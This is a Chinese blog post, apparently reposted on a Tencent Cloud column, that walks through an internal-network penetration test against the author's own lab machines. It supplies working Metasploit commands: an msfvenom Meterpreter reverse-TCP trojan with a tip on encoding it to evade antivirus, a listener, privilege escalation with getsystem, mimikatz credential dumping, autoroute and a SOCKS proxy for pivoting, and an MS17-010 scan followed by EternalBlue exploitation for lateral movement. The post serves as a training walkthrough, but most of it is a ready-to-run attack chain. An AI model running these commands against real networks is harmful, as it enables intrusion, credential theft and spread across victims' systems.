前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透的一次记录

内网渗透的一次记录

作者头像
洛米唯熊
发布2019-08-05 14:23:48
9770
发布2019-08-05 14:23:48
举报
文章被收录于专栏:洛米唯熊洛米唯熊

‍‍‍‍‍‍‍‍‍‍0x00:前言‍‍‍‍‍

‍‍‍ ‍‍在对目标进行渗透‍‍时‍,一般‍情况下,我们首先获得对方‍服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续再对目标服务器进行进一步的权限控制。‍‍比如布置后门、‍跳板、‍‍维持权限等‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍;我这就简单的就靶机演示一下内网的渗透。

‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍0x01:环境准备‍‍‍‍‍

‍‍ 1、利用msf生成远控木马。‍如果对方服务器有杀软,还需要进行shellcode编码或者进行做免杀处理,不然马?上不去。‍‍

‍‍‍‍‍‍

代码语言:javascript
复制
命令:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost="IP" lport=5155 -f exe -o ./system64.exe

“IP”为你自己kali的“外网”IP

2、把生成的马?放上对方的服务器上。

3、kali中kali开启监听模式

我是在服务器中部署了kali,所以IP已经是“外网”的

‍生‍

执行“exploit”

就获取到了会话

(别问为什么不继续,因为靶机出不去“外网”

只能自己虚拟机搭建环境演示。)

4、下面我演示的是自己内网的一台虚拟机。我也在同网段开启了三台机器来模拟内网。

2008 R2 虚拟机的IP是192.168.124.27

kali环境的准备

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.124.11
set lport 5155
exploit

‍‍‍Kali执行“exploit”开启监听模式

然后去对方服务器执行“luomiweixiong.exe”木马?

获取到会话

0x02:深入内网

1、首先要获取目前的权限,当然手上的权限越大,越方便。

这里可以利用"getsystem"获取到system最高权限。

2、查验是否为虚拟机

代码语言:javascript
复制
run checkvm

这里可以看到对方为虚拟机

3、查网段

代码语言:javascript
复制
run get_local_subnets

对方为192.168.124.0/24网段

4、获取路由信息

代码语言:javascript
复制
run get_local_subnets
代码语言:javascript
复制

5、自动添加路由信息

代码语言:javascript
复制
run post/multi/manage/autoroute

6、查看路由信息

代码语言:javascript
复制
run autoroute -p
代码语言:javascript
复制

‍‍‍

7、获取凭证

代码语言:javascript
复制
load mimikatz
wdigest

这里打码的地方是我虚拟机的明文密码

这里就不展示了

8、流量跳板

首先要通过socks4代理进行流量转发出来

代码语言:javascript
复制
background
use auxiliary/server/socks4a
show options
set srvhost 192.168.124.27
run
netstat -antp | grep 1080

跳板准备完毕

9、进程迁移

代码语言:javascript
复制
绑定进程:migratepid

10、内网IP存活检测

先将网段加进路由表

IP段端口简单检测

代码语言:javascript
复制
使用MSF检测IP段MS17010漏洞:
use auxiliary/scanner/smb/smb_ms17_010 
show options
set rhosts IP段/24
set threads 50
run

192.168.124.20的445端口开启着(它是我的win7虚拟机)

进一步利用

代码语言:javascript
复制
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.124.20
run

最后会获取到会话,这样就完成了一次跳跃。获取到会话后,就可以按上面的命令进行获取信息了。比如获取用户名,进程等。

。。 如果对方是利用路由做的IP二次动态分配,比如,192.168.124.0/24分配了192.168.125.0/24。那么也有办法进行纵向的渗透。

这里也有很多命令,建立大家做笔记

代码语言:javascript
复制
https://www.freebuf.com/company-information/189580.html

请开动你的脑洞,敲起你的键盘,内网漫游起来吧。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-08-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档